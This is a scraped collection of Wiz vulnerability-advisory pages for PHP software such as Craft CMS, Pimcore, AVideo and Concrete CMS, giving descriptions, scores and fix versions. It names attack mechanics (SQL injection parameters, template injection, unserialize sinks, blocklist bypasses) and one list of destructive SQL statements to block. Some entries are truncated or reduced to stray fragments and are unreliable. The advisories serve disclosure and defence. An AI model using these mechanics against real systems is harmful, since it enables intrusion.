A flaw was found in Moodle. An authorization logic flaw, specifically due to incomplete role checks during the badge awarding process, allowed badges to be granted without proper verification. This could enable unauthorized users to obtain badges they are not entitled to, potentially leading to privilege escalation or unauthorized access to certain features.
Source : NVD
## 9.8
Score
Published February 3, 2026
Severity CRITICAL
CNA Score 5.4
Affected Technologies
PHP
NixOS
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
moodle
moodle/moodle
Sources
Wiz
CVE-2026-23496 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-23496 [MEDIUM] CVE-2026-23496 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23496 :
PHP vulnerability analysis and mitigation
Pimcore Web2Print Tools Bundle adds tools for web-to-print use cases to Pimcore. Prior to 5.2.2 and 6.1.1, the application fails to enforce proper server-side authorization checks on the API endpoint responsible for managing "Favourite Output Channel Configurations." Testing revealed that an authenticated backend user without explicitely lacking permissions for this feature was still able to successfully invoke the endpoint and modify or retrieve these configurations. This vulnerability is fixed in 5.2.2 and 6.1.1.
Source : NVD
## 5.4
Score
Published January 15, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N
Wiz
CVE-2026-28697 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-28697 [CRITICAL] CVE-2026-28697 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28697 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 4.17.0-beta.1 and 5.9.0-beta.1, an authenticated administrator can achieve Remote Code Execution (RCE) by injecting a Server-Side Template Injection (SSTI) payload into Twig template fields (e.g., Email Templates). By calling the craft.app.fs.write() method, an attacker can write a malicious PHP script to a web-accessible directory and subsequently access it via the browser to execute arbitrary system commands. This vulnerability is fixed in 4.17.0-beta.1 and 5.9.0-beta.1.
Source : NVD
## 9.4
Score
Published March 4, 2026
Severity CRITICAL
CNA Score 9.4
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
Wiz
CVE-2026-23495 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-23495 [MEDIUM] CVE-2026-23495 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-23495 :
PHP vulnerability analysis and mitigation
Pimcore's Admin Classic Bundle provides a Backend UI for Pimcore. Prior to 2.2.3 and 1.7.16, the API endpoint for listing Predefined Properties in the Pimcore platform lacks adequate server-side authorization checks. Predefined Properties are configurable metadata definitions (e.g., name, key, type, default value) used across documents, assets, and objects to standardize custom attributes and improve editorial workflows, as documented in Pimcore's official properties guide. Testing confirmed that an authenticated backend user without explicit permissions for property management could successfully call the endpoint and retrieve the complete list of these configurations. The vulnerability is fixed in 2.2.3 and 1.7.16.
Source :
Wiz
CVE-2026-29174 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.7
CVE-2026-29174 [HIGH] CVE-2026-29174 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29174 :
PHP vulnerability analysis and mitigation
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Craft Commerce is vulnerable to SQL Injection in the inventory levels table data endpoint. The sort[0][direction] and sort[0][sortField] parameters are concatenated directly into an addOrderBy() clause without any validation or sanitization. An authenticated attacker with access to the Commerce Inventory section can inject arbitrary SQL queries, potentially leading to a full database compromise. This vulnerability is fixed in 5.5.3.
Source : NVD
## 8.7
Score
Published March 10, 2026
Severity HIGH
CNA Score 8.7
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation
Wiz
CVE-2025-68454 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.2
CVE-2025-68454 [MEDIUM] CVE-2025-68454 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68454 :
PHP vulnerability analysis and mitigation
map
Source : NVD
## 5.2
Score
Published January 5, 2026
Severity MEDIUM
CNA Score 5.2
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 66
Exploitation Probability (EPSS) 0.5
Affected packages and libraries
cpe:2.3:a:craftcms:craft_cms
craftcms/cms
Sources
Composer Severity MEDIUM Has Fix Added at: Jan 05, 2026
Linux Severity HIGH Has Fix Added at: Jan 06, 2026
Windows Severity HIGH Has Fix Added at: Jan 06, 2026
Linux Severity HIGH Has Fix Added at: Jan 13, 2026
Windows Severity HIGH Has Fix Added at: Jan 13, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs i
Wiz
CVE-2026-3452 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.9
CVE-2026-3452 [HIGH] CVE-2026-3452 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3452 :
PHP vulnerability analysis and mitigation
Concrete CMS below version 9.4.8 is vulnerable to Remote Code Execution by stored PHP object injection into the Express Entry List block via the columns parameter. An authenticated administrator can store attacker-controlled serialized data in block configuration fields that are later passed to unserialize() without class restrictions or integrity checks. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 8.9 with vector CVSS:4.0/AV:N/AC:H/AT:P/PR:H/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H. Thanks YJK ( @YJK0805 https://hackerone.com/yjk0805 ) of ZUSO ART https://zuso.ai/ for reporting.
Source : NVD
## 8.9
Score
Published March 4, 2026
Severity HIGH
CNA Score 8.9
Affected Technologies
PHP
Has Publ
Wiz
CVE-2025-68456 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.0
CVE-2025-68456 [HIGH] CVE-2025-68456 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-68456 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In versions 5.0.0-RC1 through 5.8.20 and 3.0.0 through 4.16.16, unauthenticated users can trigger database backup operations via specific admin actions, potentially leading to resource exhaustion or information disclosure. Users should update to the patched versions (5.8.21 and 4.16.17) to mitigate the issue. Craft 3 users should update to the latest Craft 4 and 5 releases, which include the fixes.
Source : NVD
## 7
Score
Published January 5, 2026
Severity HIGH
CNA Score 7.0
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 38.5
Exploi
Wiz
GHSA-vfpx-q664-h93m Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-vfpx-q664-h93m Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-vfpx-q664-h93m :
PHP vulnerability analysis and mitigation
## Impact
In applications built with the Auth0 PHP SDK, cookies are encrypted with insufficient entropy, which may result in threat actors brute-forcing the encryption key and forging session cookies.
## Am I Affected?
Consumers are affected if their application meets the following preconditions:
It is using the Auth0 WordPress Plugin, versions between 5.0.0-BETA0 and 5.5.0
Auth0 WordPress plugin using the Auth0-PHP SDK versions between 8.0.0 to 8.18.0.
## Resolution
Upgrade Auth0/wordpress to version 5.6.0 or greater.
Source : NVD
## 8.2
Score
Published April 3, 2026
Severity HIGH
CNA Score N/A
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA
Wiz
CVE-2026-32935 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.2
CVE-2026-32935 [HIGH] CVE-2026-32935 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32935 :
PHP vulnerability analysis and mitigation
phpseclib is a PHP secure communications library. Projects using versions 1.0.26 and below, 2.0.0 through 2.0.51, and 3.0.0 through 3.0.49 are vulnerable to a to padding oracle timing attack when using AES in CBC mode. This issue has been fixed in versions 1.0.27, 2.0.52 and 3.0.50.
Source : NVD
## 8.2
Score
Published March 20, 2026
Severity HIGH
CNA Score 8.2
Affected Technologies
PHP
Linux Debian
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 2.8
Exploitation Probability (EPSS) N/A
Affected packages and libraries
nextcloud-nginx
phpseclib
Sources
NVD
Debian 11, 12, 13, 14 Severity MEDIUM Has Fix Added at: Mar 21,
Wiz
CVE-2026-33766 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-33766 [MEDIUM] CVE-2026-33766 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33766 :
PHP vulnerability analysis and mitigation
isSSRFSafeURL()
url_get_contents()
Source : NVD
## 5.3
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 10.2
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h
Wiz
CVE-2026-35448 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 3.7
CVE-2026-35448 [LOW] CVE-2026-35448 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35448 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions 26.0 and prior, the BlockonomicsYPT plugin's check.php endpoint returns payment order data for any Bitcoin address without requiring authentication. The endpoint was designed as an AJAX polling helper for the authenticated invoice.php page, but it performs no access control checks of its own. Since Bitcoin addresses are publicly visible on the blockchain, an attacker can query payment records for any address used on the platform.
Source : NVD
## 3.7
Score
Published April 6, 2026
Severity LOW
CNA Score 3.7
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percent
Wiz
CVE-2026-3240 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.8
CVE-2026-3240 [MEDIUM] CVE-2026-3240 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-3240 :
PHP vulnerability analysis and mitigation
In Concrete CMS below version 9.4.8, a user with permission to edit a page with element Legacy form can perform a stored XSS attack towards high-privilege accounts via the Question field. The Concrete CMS security team gave this vulnerability a CVSS v.4.0 score of 4.8 with vector CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N Thanks minhnn42, namdi and quanlna2 from VCSLab-Viettel Cyber Security for reporting.
Source : NVD
## 4.8
Score
Published March 4, 2026
Severity MEDIUM
CNA Score 4.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 5.5
Exploitation Probability (EPSS) N/A
Affec
Wiz
CVE-2026-21446 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.8
CVE-2026-21446 [HIGH] CVE-2026-21446 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-21446 :
PHP vulnerability analysis and mitigation
/install/api/*
Source : NVD
## 8.8
Score
Published January 2, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 33.6
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
bagisto/bagisto
Sources
NVD
Composer Severity HIGH Has Fix Added at: Jan 03, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIGH
Wiz
CVE-2026-26989 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 4.3
CVE-2026-26989 [MEDIUM] CVE-2026-26989 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26989 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below are affected by a Stored Cross-Site Scripting (XSS) vulnerability in the Alert Rules workflow. An attacker with administrative privileges can inject malicious scripts that execute in the browser context of any user who accesses the Alert Rules page. This issue has been fixed in version 26.2.0.
Source : NVD
## 4.8
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 4.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 0.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
Wiz
CVE-2026-33157 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 8.6
CVE-2026-33157 [HIGH] CVE-2026-33157 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33157 :
PHP vulnerability analysis and mitigation
Craft CMS is a content management system (CMS). From version 5.6.0 to before version 5.9.13, a Remote Code Execution (RCE) vulnerability exists in Craft CMS, it can be exploited by any authenticated user with control panel access. This is a bypass of a previous fix. The existing patches add cleanseConfig() to assembleLayoutFromPost() and various FieldsController actions to strip Yii2 behavior/event injection keys ("as" and "on" prefixed keys). However, the fieldLayouts parameter in ElementIndexesController::actionFilterHud() is passed directly to FieldLayout::createFromConfig() without any sanitization, enabling the same behavior injection attack chain. This issue has been patched in version 5.9.13.
Source : NVD
## 8.6
Sc
Wiz
CVE-2026-30940 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-30940 [HIGH] CVE-2026-30940 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-30940 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, a path traversal vulnerability exists in the theme file management API (/baser/api/admin/bc-theme-file/theme_files/add.json) that allows arbitrary file write. An authenticated administrator can include ../ sequences in the path parameter to create a PHP file in an arbitrary directory outside the theme directory, which may result in remote code execution (RCE). This issue has been patched in version 5.2.3.
Source : NVD
## 7.2
Score
Published March 31, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS)
Wiz
CVE-2026-28783 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.4
CVE-2026-28783 [CRITICAL] CVE-2026-28783 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-28783 :
PHP vulnerability analysis and mitigation
Craft is a content management system (CMS). Prior to 5.9.0-beta.1 and 4.17.0-beta.1, Craft CMS implements a blocklist to prevent potentially dangerous PHP functions from being called via Twig non-Closure arrow functions. In order to be able to successfully execute this attack, you need to either have allowAdminChanges enabled on production, or a compromised admin account, or an account with access to the System Messages utility. Several PHP functions are not included in the blocklist, which could allow malicious actors with the required permissions to execute various types of payloads, including RCEs, arbitrary file reads, SSRFs, and SSTIs. This vulnerability is fixed in 5.9.0-beta.1 and 4.17.0-beta.1.
Source : NVD
## 9.4
Wiz
CVE-2026-29782 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.2
CVE-2026-29782 [HIGH] CVE-2026-29782 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-29782 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to version 2.10.2, the oauth2.php file in OpenSTAManager is an unauthenticated endpoint ($skip_permissions = true). It loads a record from the zz_oauth2 table using the attacker-controlled GET parameter state, and during the OAuth2 configuration flow calls unserialize() on the access_token field without any class restriction. This issue has been patched in version 2.10.2.
Source : NVD
## 7.2
Score
Published April 2, 2026
Severity HIGH
CNA Score 7.2
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11.4
Wiz
CVE-2026-33673 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.6
CVE-2026-33673 [HIGH] CVE-2026-33673 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33673 :
PHP vulnerability analysis and mitigation
PrestaShop is an open source e-commerce web application. Versions prior to 8.2.5 and 9.1.0 are vulnerable to stored Cross-Site Scripting (stored XSS) vulnerabilities in the BO. An attacker who can inject data into the database, via limited back-office access or a previously existing vulnerability, can exploit unprotected variables in back-office templates. Versions 8.2.5 and 9.1.0 contain a fix. No known workarounds are available.
Source : NVD
## 5.4
Score
Published March 26, 2026
Severity MEDIUM
CNA Score 7.6
Affected Technologies
PHP
Prestashop
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 11
Exploitation Probability (
Wiz
CVE-2026-32734 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 7.1
CVE-2026-32734 [HIGH] CVE-2026-32734 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-32734 :
PHP vulnerability analysis and mitigation
baserCMS is a website development framework. Prior to version 5.2.3, baserCMS has DOM-based cross-site scripting in tag creation. This issue has been patched in version 5.2.3.
Source : NVD
## 6.1
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 7.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 9.3
Exploitation Probability (EPSS) N/A
Affected packages and libraries
baserproject/basercms
Sources
NVD
Composer Severity HIGH Has Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's l
Wiz
CVE-2026-4175 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-4175 [MEDIUM] CVE-2026-4175 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-4175 :
PHP vulnerability analysis and mitigation
A vulnerability was determined in Aureus ERP up to 1.3.0-BETA2. The affected element is an unknown function of the file plugins/webkul/chatter/resources/views/filament/infolists/components/messages/content-text-entry.blade.php of the component Chatter Message Handler. Executing a manipulation of the argument subject/body can lead to cross site scripting. The attack can be launched remotely. Upgrading to version 1.3.0-BETA1 is sufficient to fix this issue. This patch is called 2135ee7efff4090e70050b63015ab5e268760ec8. It is suggested to upgrade the affected component.
Source : NVD
## 5.1
Score
Published March 16, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit N
Wiz
CVE-2026-35470 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-35470 [MEDIUM] CVE-2026-35470 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-35470 :
PHP vulnerability analysis and mitigation
OpenSTAManager is an open source management software for technical assistance and invoicing. Prior to 2.10.2, confronta_righe.php files across different modules in OpenSTAManager contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation. An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data. This vulnerability is fixed in 2.10.2.
Source : NVD
## 8.8
Score
Published April 6, 2026
Severity HIGH
CNA Score 8.8
Affected Technologies
PHP
Has Public Exploi
Wiz
GHSA-898v-775g-777c Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
[MEDIUM] GHSA-898v-775g-777c Impact, Exploitability, and Mitigation Steps | Wiz
## GHSA-898v-775g-777c :
PHP vulnerability analysis and mitigation
## Impact
MySQLWriteTool
PDO::prepare()
execute()
DROP TABLE
TRUNCATE
DELETE
ALTER
MySQLWriteTool
## Patches
Not patched in: 2.8.11
Recommended improvements (even if keeping the tool intentionally powerful):
insertRecord
updateRecord
INSERT
UPDATE
DROP/TRUNCATE/ALTER/GRANT
Add optional review workflow: log + require human approval for high-risk statements; or “dry-run” mode.
Document strongly that the tool must not be exposed to untrusted prompts without additional safeguards.
## Workarounds
MySQLWriteTool
DROP
ALTER
GRANT
DROP
TRUNCATE
ALTER
GRANT
REVOKE
CREATE USER
Implement authorization gating for tool calls (RBAC, allow tool use only for trusted operators).
Source : NVD
## 9.4
S
Wiz
CVE-2026-34565 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-34565 [CRITICAL] CVE-2026-34565 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34565 :
PHP vulnerability analysis and mitigation
CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. Prior to version 0.31.0.0, the application fails to properly sanitize user-controlled input when adding Posts to navigation menus through the Menu Management functionality. Post-related data selected via the Posts section is stored server-side and rendered without proper output encoding. These stored values are later rendered unsafely within administrative dashboards and public-facing navigation menus, resulting in stored DOM-based cross-site scripting (XSS). This issue has been patched in version 0.31.0.0.
Source : NVD
## 9
Score
Published April 1, 2026
Severity CRITICAL
CNA Sco
Wiz
CVE-2025-14894 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.8
CVE-2025-14894 [CRITICAL] CVE-2025-14894 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2025-14894 :
PHP vulnerability analysis and mitigation
Livewire Filemanager, commonly used in Laravel applications, contains LivewireFilemanagerComponent.php, which does not perform file type and MIME validation, allowing for RCE through upload of a malicious php file that can then be executed via the /storage/ URL if a commonly performed setup process within Laravel applications has been completed.
Source : NVD
## 9.8
Score
Published January 16, 2026
Severity CRITICAL
CNA Score 7.5
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 3.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
livewire-filemanager/filemanager
Sources
NVD
Co
Wiz
CVE-2026-31825 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-31825 [MEDIUM] CVE-2026-31825 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-31825 :
PHP vulnerability analysis and mitigation
Sylius is an Open Source eCommerce Framework on Symfony. Sylius API filters ProductPriceOrderFilter and TranslationOrderNameAndLocaleFilter pass user-supplied order direction values directly to Doctrine's orderBy() without validation. An attacker can inject arbitrary DQL. The issue is fixed in versions: 1.9.12, 1.10.16, 1.11.17, 1.12.23, 1.13.15, 1.14.18, 2.0.16, 2.1.12, 2.2.3 and above.
Source : NVD
## 5.3
Score
Published March 10, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 12.6
Exploitation Probability (EPSS) N/A
Affected packages and libraries
sylius/syl
Wiz
CVE-2026-34247 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.4
CVE-2026-34247 [MEDIUM] CVE-2026-34247 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34247 :
PHP vulnerability analysis and mitigation
plugin/Live/uploadPoster.php
live_schedule_id
User::isLogged()
socketLiveOFFCallback
Source : NVD
## 5.4
Score
Published March 27, 2026
Severity MEDIUM
CNA Score 5.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1.1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Mar 29, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
Wiz
CVE-2026-25494 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.9
CVE-2026-25494 [MEDIUM] CVE-2026-25494 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25494 :
PHP vulnerability analysis and mitigation
Craft is a platform for creating digital experiences. In Craft versions 4.0.0-RC1 through 4.16.17 and 5.0.0-RC1 through 5.8.21, the saveAsset GraphQL mutation uses filter_var(..., FILTER_VALIDATE_IP) to block a specific list of IP addresses. However, alternative IP notations (hexadecimal, mixed) are not recognized by this function, allowing attackers to bypass the blocklist and access cloud metadata services. This issue is patched in versions 4.16.18 and 5.8.22.
Source : NVD
## 6.9
Score
Published February 9, 2026
Severity MEDIUM
CNA Score 6.9
Affected Technologies
PHP
Craft CMS
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EP
Wiz
CVE-2026-26987 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-26987 [MEDIUM] CVE-2026-26987 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-26987 :
PHP vulnerability analysis and mitigation
LibreNMS is an auto-discovering PHP/MySQL/SNMP based network monitoring tool. Versions 25.12.0 and below are vulnerable to Reflected XSS attacks via email field. This issue has been fixed in version 26.2.0.
Source : NVD
## 5.3
Score
Published February 20, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) N/A
Exploitation Probability (EPSS) N/A
Affected packages and libraries
librenms/librenms
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 19, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what
Wiz
CVE-2026-25523 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.3
CVE-2026-25523 [MEDIUM] CVE-2026-25523 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-25523 :
PHP vulnerability analysis and mitigation
Magento-lts is a long-term support alternative to Magento Community Edition (CE). Prior to version 20.16.1, the admin url can be discovered without prior knowledge of it's location by exploiting the X-Original-Url header on some configurations. This issue has been patched in version 20.16.1.
Source : NVD
## 5.3
Score
Published February 4, 2026
Severity MEDIUM
CNA Score 5.3
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 1
Exploitation Probability (EPSS) N/A
Affected packages and libraries
openmage/magento-lts
Sources
NVD
Composer Severity MEDIUM Has Fix Added at: Feb 04, 2026
## Get a CVE ri
Wiz
CVE-2026-33867 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 9.1
CVE-2026-33867 [CRITICAL] CVE-2026-33867 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-33867 :
PHP vulnerability analysis and mitigation
WWBN AVideo is an open source video platform. In versions up to and including 26.0, AVideo allows content owners to password-protect individual videos. The video password is stored in the database in plaintext — no hashing, salting, or encryption is applied. If an attacker gains read access to the database (via SQL injection, a database backup, or misconfigured access controls), they obtain all video passwords in cleartext. Commit f2d68d2adbf73588ea61be2b781d93120a819e36 contains a patch.
Source : NVD
## 9.1
Score
Published March 27, 2026
Severity CRITICAL
CNA Score 9.1
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probabilit
Wiz
CVE-2026-34716 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 6.4
CVE-2026-34716 [MEDIUM] CVE-2026-34716 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-34716 :
PHP vulnerability analysis and mitigation
## ' + heading + '
Source : NVD
## 6.4
Score
Published March 31, 2026
Severity MEDIUM
CNA Score 6.4
Affected Technologies
PHP
Has Public Exploit Yes
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
Exploitation Probability Percentile (EPSS) 17
Exploitation Probability (EPSS) 0.1
Affected packages and libraries
wwbn/avideo
Sources
NVD
Composer Severity MEDIUM No Fix Added at: Apr 02, 2026
## Get a CVE risk assessment
Get a prioritized view of CVEs in your cloud—so you can focus on what's exploitable, not just what's listed.
## Related PHP vulnerabilities:
CVE ID
Severity
Score
Technologies
Component name
CISA KEV exploit
Has fix
Published date
GHSA-h6rj-3m53-887h
HIG
Wiz
CVE-2026-27568 Impact, Exploitability, and Mitigation Steps | Wiz
blogs_wiz·CVSS 5.1
CVE-2026-27568 [MEDIUM] CVE-2026-27568 Impact, Exploitability, and Mitigation Steps | Wiz
## CVE-2026-27568 :
PHP vulnerability analysis and mitigation
javascript:
javascript:
Source : NVD
## 5.1
Score
Published February 24, 2026
Severity MEDIUM
CNA Score 5.1
Affected Technologies
PHP
Has Public Exploit No
Has CISA KEV Exploit No
CISA KEV Release Date N/A
CISA KEV Due Date N/A
